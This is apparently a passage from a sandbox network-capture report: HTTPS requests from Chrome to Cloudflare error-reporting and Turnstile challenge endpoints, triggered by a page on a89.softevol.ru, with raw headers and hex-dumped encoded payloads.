                                                                2025-01-10 21:29:05 UTC1369INData Raw: 31 4f 54 31 4e 50 64 6e 75 45 53 48 68 6b 57 48 64 72 6a 47 68 6f 61 48 4a 64 59 57 35 6a 59 57 36 51 55 6d 64 31 57 59 36 50 58 4a 36 4d 65 35 35 65 6e 33 61 6e 5a 6e 5a 37 6f 5a 36 69 63 48 36 49 67 6f 75 47 71 4a 68 33 64 5a 75 77 75 4c 47 4f 66 6f 69 32 71 34 76 41 68 5a 69 68 6c 4c 79 64 79 72 71 6f 7a 61 57 74 75 61 53 4d 69 35 43 4e 6b 39 47 6e 79 64 54 4b 6d 73 75 61 30 74 4b 71 30 4e 37 65 73 38 62 55 74 37 76 4c 32 4f 4c 57 7a 73 48 4c 37 2f 50 79 7a 75 54 78 39 66 6a 6c 72 65 58 58 33 4c 62 4a 41 4d 44 38 42 64 4c 77 34 41 44 79 41 76 6a 71 2b 2b 6a 59 35 64 73 49 79 68 50 51 30 51 77 4c 37 4e 49 61 39 52 55 62 30 66 59 4b 2f 66 6a 68 44 77 4d 68 47 76 58 7a 4b 77 63 4a 2b 79 54 2b 37 41 4d 73 4a 79 33 77 42 79 38 56 4a 2f 73 50 4b 66 30 4a 39
                                                                Data Ascii: 1OT1NPdnuESHhkWHdrjGhoaHJdYW5jYW6QUmd1WY6PXJ6Me55en3anZnZ7oZ6icH6IgouGqJh3dZuwuLGOfoi2q4vAhZihlLydyrqozaWtuaSMi5CNk9GnydTKmsua0tKq0N7es8bUt7vL2OLWzsHL7/PyzuTx9fjlreXX3LbJAMD8BdLw4ADyAvjq++jY5dsIyhPQ0QwL7NIa9RUb0fYK/fjhDwMhGvXzKwcJ+yT+7AMsJy3wBy8VJ/sPKf0J9
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 2f 69 55 64 31 61 34 61 4f 5a 45 4a 2f 65 34 70 69 55 6d 75 44 61 31 46 6f 5a 6d 35 61 57 59 75 68 6e 35 5a 73 58 58 61 41 58 34 42 78 6d 61 65 46 6f 36 69 43 66 49 4e 70 68 47 79 67 67 61 36 71 6a 57 79 72 6b 6e 6c 35 6e 5a 4b 32 73 4a 6e 42 78 71 53 30 74 5a 7a 47 68 5a 32 58 6d 73 69 69 71 4c 2b 6c 79 74 47 70 32 4b 36 73 6d 4e 4b 63 73 61 36 31 73 64 65 63 31 39 62 51 70 70 2b 6e 76 64 75 6a 33 38 7a 42 33 4b 6e 6b 78 4d 37 64 37 50 53 78 73 4e 58 6d 2b 39 6a 4d 74 64 47 38 73 2b 76 63 7a 4c 7a 78 35 76 6a 36 35 2f 58 64 31 38 6b 51 32 51 30 4d 2f 74 51 54 45 50 6a 76 31 77 34 4f 43 50 6e 77 39 52 34 6a 44 74 6e 35 47 43 41 43 43 75 44 71 48 66 63 46 4b 6a 41 4b 38 53 72 75 38 43 7a 74 4b 43 51 57 45 2f 6b 62 43 50 77 72 45 78 31 45 52 52 52 43 49 30
                                                                Data Ascii: /iUd1a4aOZEJ/e4piUmuDa1FoZm5aWYuhn5ZsXXaAX4BxmaeFo6iCfINphGygga6qjWyrknl5nZK2sJnBxqS0tZzGhZ2XmsiiqL+lytGp2K6smNKcsa61sdec19bQpp+nvduj38zB3KnkxM7d7PSxsNXm+9jMtdG8s+vczLzx5vj65/Xd18kQ2Q0M/tQTEPjv1w4OCPnw9R4jDtn5GCACCuDqHfcFKjAK8Sru8CztKCQWE/kbCPwrEx1ERRRCI0
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 5a 6d 79 53 53 6c 32 53 69 32 71 55 64 35 4e 55 63 49 71 55 57 34 75 4e 6b 6c 79 56 64 36 4f 45 70 32 69 55 58 49 70 36 5a 49 65 41 6f 4a 75 74 62 59 4a 2f 71 4b 2b 51 70 5a 57 63 72 33 32 73 76 6e 6d 30 65 4b 47 2b 77 4b 47 6e 6b 4c 32 56 78 6f 61 2b 77 4d 47 48 69 4a 47 53 69 72 53 53 6f 4d 58 45 79 4e 57 72 6c 4c 61 32 79 4e 43 7a 75 64 57 35 77 37 36 2b 34 64 75 31 34 61 58 47 32 2b 44 4a 30 63 48 43 37 38 4c 71 7a 65 2b 78 31 64 33 37 76 72 33 79 36 77 47 31 37 63 37 79 30 73 4c 45 34 4d 66 6a 78 4e 37 64 45 74 44 2b 45 2b 66 79 79 41 58 6e 34 2b 34 47 45 2f 48 35 2f 52 72 34 44 65 30 52 46 77 62 34 49 75 50 6e 43 74 34 46 47 79 58 39 4c 53 7a 79 36 68 58 74 39 69 77 5a 39 42 6b 4f 43 44 4c 33 44 54 6b 69 44 54 77 52 4d 68 77 57 2b 79 45 66 43 30 59
                                                                Data Ascii: ZmySSl2Si2qUd5NUcIqUW4uNklyVd6OEp2iUXIp6ZIeAoJutbYJ/qK+QpZWcr32svnm0eKG+wKGnkL2Vxoa+wMGHiJGSirSSoMXEyNWrlLa2yNCzudW5w76+4du14aXG2+DJ0cHC78Lqze+x1d37vr3y6wG17c7y0sLE4MfjxN7dEtD+E+fyyAXn4+4GE/H5/Rr4De0RFwb4IuPnCt4FGyX9LSzy6hXt9iwZ9BkOCDL3DTkiDTwRMhwW+yEfC0Y
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 6e 52 6e 67 6e 70 34 61 57 74 2b 6e 33 2b 56 59 48 70 78 66 6e 61 62 65 70 35 30 64 6f 75 43 71 33 78 6f 59 71 65 54 6a 4a 4b 30 62 36 61 4d 75 58 53 38 6b 49 70 2b 76 5a 42 34 72 5a 2b 58 66 37 4b 51 65 73 4b 72 70 5a 79 44 78 4d 43 39 72 61 61 54 7a 62 53 67 7a 4b 71 77 6c 38 71 61 31 4e 43 30 75 65 47 30 34 5a 33 65 30 61 61 38 6f 37 66 6d 33 65 61 6d 78 37 6a 64 33 66 54 31 72 65 54 6f 30 38 4f 32 2b 50 57 32 30 4e 6e 41 2f 64 75 31 75 75 44 31 7a 39 69 2f 42 38 50 74 44 39 6e 33 36 67 4c 6a 33 74 49 49 42 65 54 79 45 4e 50 6d 43 50 51 54 47 4e 30 69 44 52 67 64 38 76 54 66 49 42 66 6a 36 74 34 42 35 4f 34 48 4a 67 49 48 42 77 41 49 4c 43 77 76 44 69 6f 74 4f 66 73 63 2f 54 67 77 45 67 34 78 51 55 67 6d 50 43 59 34 4b 78 39 51 4c 55 73 76 4c 7a 78 56
                                                                Data Ascii: nRngnp4aWt+n3+VYHpxfnabep50douCq3xoYqeTjJK0b6aMuXS8kIp+vZB4rZ+Xf7KQesKrpZyDxMC9raaTzbSgzKqwl8qa1NC0ueG04Z3e0aa8o7fm3eamx7jd3fT1reTo08O2+PW20NnA/du1uuD1z9i/B8PtD9n36gLj3tIIBeTyENPmCPQTGN0iDRgd8vTfIBfj6t4B5O4HJgIHBwAILCwvDiotOfsc/TgwEg4xQUgmPCY4Kx9QLUsvLzxV


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.84973735.190.80.14431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:04 UTC536OUTOPTIONS /report/v4?s=L%2Fki3fnwNHqhvJN2WWZF4CvLsUqc%2FdQjsaVfqhMLoUE%2BVGKuBxmpANntayqzTPNDzxT5od6xcgxIHZgrpGu9cdifB7Y6ULH9zMviuQWBsZavNtUJVnllEK1MNLqo%2BQ%3D%3D HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://a89.softevol.ru
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:04 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: POST, OPTIONS
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-length, content-type
                                                                date: Fri, 10 Jan 2025 21:29:04 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.84974035.190.80.14431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:05 UTC478OUTPOST /report/v4?s=L%2Fki3fnwNHqhvJN2WWZF4CvLsUqc%2FdQjsaVfqhMLoUE%2BVGKuBxmpANntayqzTPNDzxT5od6xcgxIHZgrpGu9cdifB7Y6ULH9zMviuQWBsZavNtUJVnllEK1MNLqo%2BQ%3D%3D HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 425
                                                                Content-Type: application/reports+json
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:05 UTC425OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 38 39 2e 73 6f 66 74 65 76 6f 6c 2e 72 75 2f 35 66 73 79 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 37 2e 31 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                                                                Data Ascii: [{"age":0,"body":{"elapsed_time":114,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://a89.softevol.ru/5fsy/","sampling_fraction":1.0,"server_ip":"172.67.147.10","status_code":404,"type":"http.error"},"type":"network-error","u
                                                                2025-01-10 21:29:05 UTC168INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                date: Fri, 10 Jan 2025 21:29:05 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.849743104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:06 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8fffc2a2e94d0f6c/1736544544923/lbf-aarKlszHGWE HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:06 UTC200INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:06 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2b89972330c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 49 00 00 00 54 08 02 00 00 00 41 59 8d ce 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRITAYIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.849744104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:06 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:06 UTC375INHTTP/1.1 404 Not Found
                                                                Date: Fri, 10 Jan 2025 21:29:06 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cf-chl-out: HQA75AjmDaX1ovJYSG0Kkg==$eeWsZgFReZNBsceCv2wh5w==
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2b8c8d342e1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.849745104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:07 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8fffc2a2e94d0f6c/1736544544923/lbf-aarKlszHGWE HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:07 UTC200INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:07 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2bc9aeb8cd6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 49 00 00 00 54 08 02 00 00 00 41 59 8d ce 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRITAYIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.849747104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:08 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8fffc2a2e94d0f6c/1736544544929/cad4417f5e26610e9e3d5789d1dbb4a5b0d68b624696dd5fe371275521076928/ULoxfGrs8uTzRfH HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:08 UTC143INHTTP/1.1 401 Unauthorized
                                                                Date: Fri, 10 Jan 2025 21:29:08 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 1
                                                                Connection: close
                                                                2025-01-10 21:29:08 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 79 74 52 42 66 31 34 6d 59 51 36 65 50 56 65 4a 30 64 75 30 70 62 44 57 69 32 4a 47 6c 74 31 66 34 33 45 6e 56 53 45 48 61 53 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gytRBf14mYQ6ePVeJ0du0pbDWi2JGlt1f43EnVSEHaSgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                2025-01-10 21:29:08 UTC1INData Raw: 4a
                                                                Data Ascii: J


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.849748104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:09 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 32399
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:09 UTC16384OUTData Raw: 76 5f 38 66 66 66 63 32 61 32 65 39 34 64 30 66 36 63 3d 61 79 4f 72 4d 68 54 4e 71 76 79 6d 79 6d 53 79 54 48 54 76 67 70 4f 48 4f 6d 4b 37 41 4e 6d 66 6d 47 70 48 4e 54 6a 67 72 68 70 56 48 6d 75 6d 63 70 41 48 25 32 62 70 6d 47 48 6d 48 58 34 64 54 50 6d 32 58 54 42 6d 41 72 58 54 7a 6d 52 47 64 66 59 6d 68 79 6d 7a 67 71 70 24 64 70 6d 61 53 48 6d 24 2b 71 4f 77 70 6d 75 52 72 68 4e 34 6d 32 2b 54 32 6d 34 4f 54 63 67 63 6d 33 76 34 6d 33 4f 54 4b 6d 34 2b 54 59 78 61 54 6d 6d 56 52 6d 33 47 4f 34 70 31 75 72 33 44 64 72 6d 42 49 49 63 62 75 6b 45 38 6d 66 49 44 51 41 48 50 4e 70 6e 67 48 49 63 6b 37 75 52 49 76 6d 33 56 65 61 50 53 78 6d 77 49 4e 6d 68 56 2b 4c 4f 4f 34 39 49 47 76 54 45 59 34 48 67 6e 63 70 68 47 6e 74 67 31 51 70 55 61 45 70 2d 41
                                                                Data Ascii: v_8fffc2a2e94d0f6c=ayOrMhTNqvymymSyTHTvgpOHOmK7ANmfmGpHNTjgrhpVHmumcpAH%2bpmGHmHX4dTPm2XTBmArXTzmRGdfYmhymzgqp$dpmaSHm$+qOwpmuRrhN4m2+T2m4OTcgcm3v4m3OTKm4+TYxaTmmVRm3GO4p1ur3DdrmBIIcbukE8mfIDQAHPNpngHIck7uRIvm3VeaPSxmwINmhV+LOO49IGvTEY4HgncphGntg1QpUaEp-A
                                                                2025-01-10 21:29:09 UTC16015OUTData Raw: 61 52 6d 66 63 50 72 66 74 56 67 33 57 72 6f 6d 70 72 66 58 68 6d 48 37 33 43 6d 59 6d 4c 70 33 69 6d 70 6d 2b 44 68 53 6d 78 6d 7a 70 33 6d 6d 24 6d 52 58 41 64 6d 71 6d 4c 58 54 6d 6d 43 72 4f 79 68 4e 54 69 65 66 68 72 41 72 55 6d 6d 4f 33 6d 54 67 70 41 6d 76 72 4c 53 6d 24 6d 61 70 68 4e 6d 35 6a 58 6d 6b 38 6d 43 6d 4f 58 68 64 6d 6c 6d 4f 58 68 64 2b 48 66 54 49 6d 2d 6d 67 77 54 6d 6d 37 69 52 67 34 47 70 6d 6d 7a 4d 42 70 56 6d 59 75 24 57 54 77 72 52 67 54 72 54 6f 6d 41 72 45 2b 33 6f 6d 33 72 52 79 33 42 6d 4a 71 33 79 33 62 6d 43 74 68 6e 6d 38 72 52 67 54 67 6b 6b 6d 6e 71 68 6e 54 67 2b 4e 70 66 79 54 32 6d 46 70 56 37 68 49 72 42 70 66 79 68 52 70 42 70 56 79 68 54 6d 51 44 34 67 68 57 6d 36 70 61 2b 68 6e 37 33 72 45 67 33 42 6d 55 6d 52
                                                                Data Ascii: aRmfcPrftVg3WromprfXhmH73CmYmLp3impm+DhSmxmzp3mm$mRXAdmqmLXTmmCrOyhNTiefhrArUmmO3mTgpAmvrLSm$maphNm5jXmk8mCmOXhdmlmOXhd+HfTIm-mgwTmm7iRg4GpmmzMBpVmYu$WTwrRgTrTomArE+3om3rRy3BmJq3y3bmCthnm8rRgTgkkmnqhnTg+NpfyT2mFpV7hIrBpfyhRpBpVyhTmQD4ghWm6pa+hn73rEg3BmUmR
                                                                2025-01-10 21:29:10 UTC322INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:10 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 26300
                                                                Connection: close
                                                                cf-chl-gen: cQzZtxGgisL2yRDNsMt53JDv9RG/P3J2m6+RwTHwMzwyAWv0sLRqr6tnlnpo7WIk$GMt74BLD0iOclhm5oaaqtw==
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2ccacac4238-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:10 UTC1047INData Raw: 5a 47 4b 4c 69 34 79 57 6b 48 64 55 6d 5a 42 35 58 6f 78 5a 67 32 56 75 6c 6f 43 45 64 70 61 45 69 48 71 4d 65 59 31 2b 65 33 53 4c 6b 6f 69 73 71 48 53 73 71 62 79 34 69 58 79 2b 6c 5a 6d 45 6e 72 36 45 6e 38 71 4b 78 4b 71 49 6f 38 43 6f 69 72 32 4a 74 4b 33 4f 79 37 65 52 6d 4d 65 4f 32 5a 75 36 79 62 79 30 30 38 58 6d 70 75 6a 46 70 75 57 6e 70 38 75 6e 71 61 2f 42 79 75 6e 6d 30 65 62 71 78 4f 2f 78 79 62 57 37 35 37 6e 71 41 2b 71 39 34 50 48 54 76 2f 6a 57 34 38 72 6b 7a 4e 67 4b 42 75 41 54 42 75 76 68 34 41 55 54 35 50 48 58 47 66 45 67 39 39 33 73 41 78 33 30 39 67 45 4a 39 42 76 70 4a 67 77 5a 41 69 4d 4e 37 69 44 70 4b 6a 59 33 45 76 4d 34 39 52 59 53 4c 77 37 78 43 7a 4d 6b 49 68 59 32 50 42 49 66 46 52 77 43 53 43 55 48 47 51 34 79 54 43 67
                                                                Data Ascii: ZGKLi4yWkHdUmZB5XoxZg2VuloCEdpaEiHqMeY1+e3SLkoisqHSsqby4iXy+lZmEnr6En8qKxKqIo8Coir2JtK3Oy7eRmMeO2Zu6yby008XmpujFpuWnp8unqa/Byunm0ebqxO/xybW757nqA+q94PHTv/jW48rkzNgKBuATBuvh4AUT5PHXGfEg993sAx309gEJ9BvpJgwZAiMN7iDpKjY3EvM49RYSLw7xCzMkIhY2PBIfFRwCSCUHGQ4yTCg
                                                                2025-01-10 21:29:10 UTC1369INData Raw: 37 5a 35 2b 6c 6a 70 79 4b 6d 32 79 72 66 58 46 72 68 62 57 44 72 37 43 35 6c 4a 47 6f 77 4c 6d 57 73 59 43 6c 6a 71 53 32 6e 35 47 47 71 37 71 4c 6f 71 37 4d 77 4c 2b 51 31 61 66 4e 30 63 6d 6b 6c 4b 2b 35 31 4b 61 63 74 4b 71 55 76 35 37 54 32 61 58 6a 74 2b 66 63 33 2b 48 76 37 65 43 72 77 4f 6e 4f 35 75 54 6f 77 74 44 37 74 64 54 7a 75 2f 6e 33 31 37 2f 44 2b 4f 62 55 39 74 6f 47 44 41 6e 6a 79 51 6e 42 42 63 6a 7a 45 73 77 46 34 42 62 67 42 77 73 4d 31 50 54 62 37 66 67 4c 42 4f 4c 38 34 2f 50 6b 34 67 63 48 47 67 44 72 49 6a 41 52 41 78 77 66 39 43 45 6f 4a 43 45 4c 45 6a 4d 2b 43 7a 6b 58 50 6a 73 67 47 69 52 46 50 41 55 45 48 44 38 4d 4a 45 63 66 47 54 49 52 45 6b 38 55 49 52 64 51 51 7a 6b 6d 4d 30 59 77 4f 6a 67 30 4c 46 38 63 4c 68 67 69 48 7a
                                                                Data Ascii: 7Z5+ljpyKm2yrfXFrhbWDr7C5lJGowLmWsYCljqS2n5GGq7qLoq7MwL+Q1afN0cmklK+51KactKqUv57T2aXjt+fc3+Hv7eCrwOnO5uTowtD7tdTzu/n317/D+ObU9toGDAnjyQnBBcjzEswF4BbgBwsM1PTb7fgLBOL84/Pk4gcHGgDrIjARAxwf9CEoJCELEjM+CzkXPjsgGiRFPAUEHD8MJEcfGTIREk8UIRdQQzkmM0YwOjg0LF8cLhgiHz
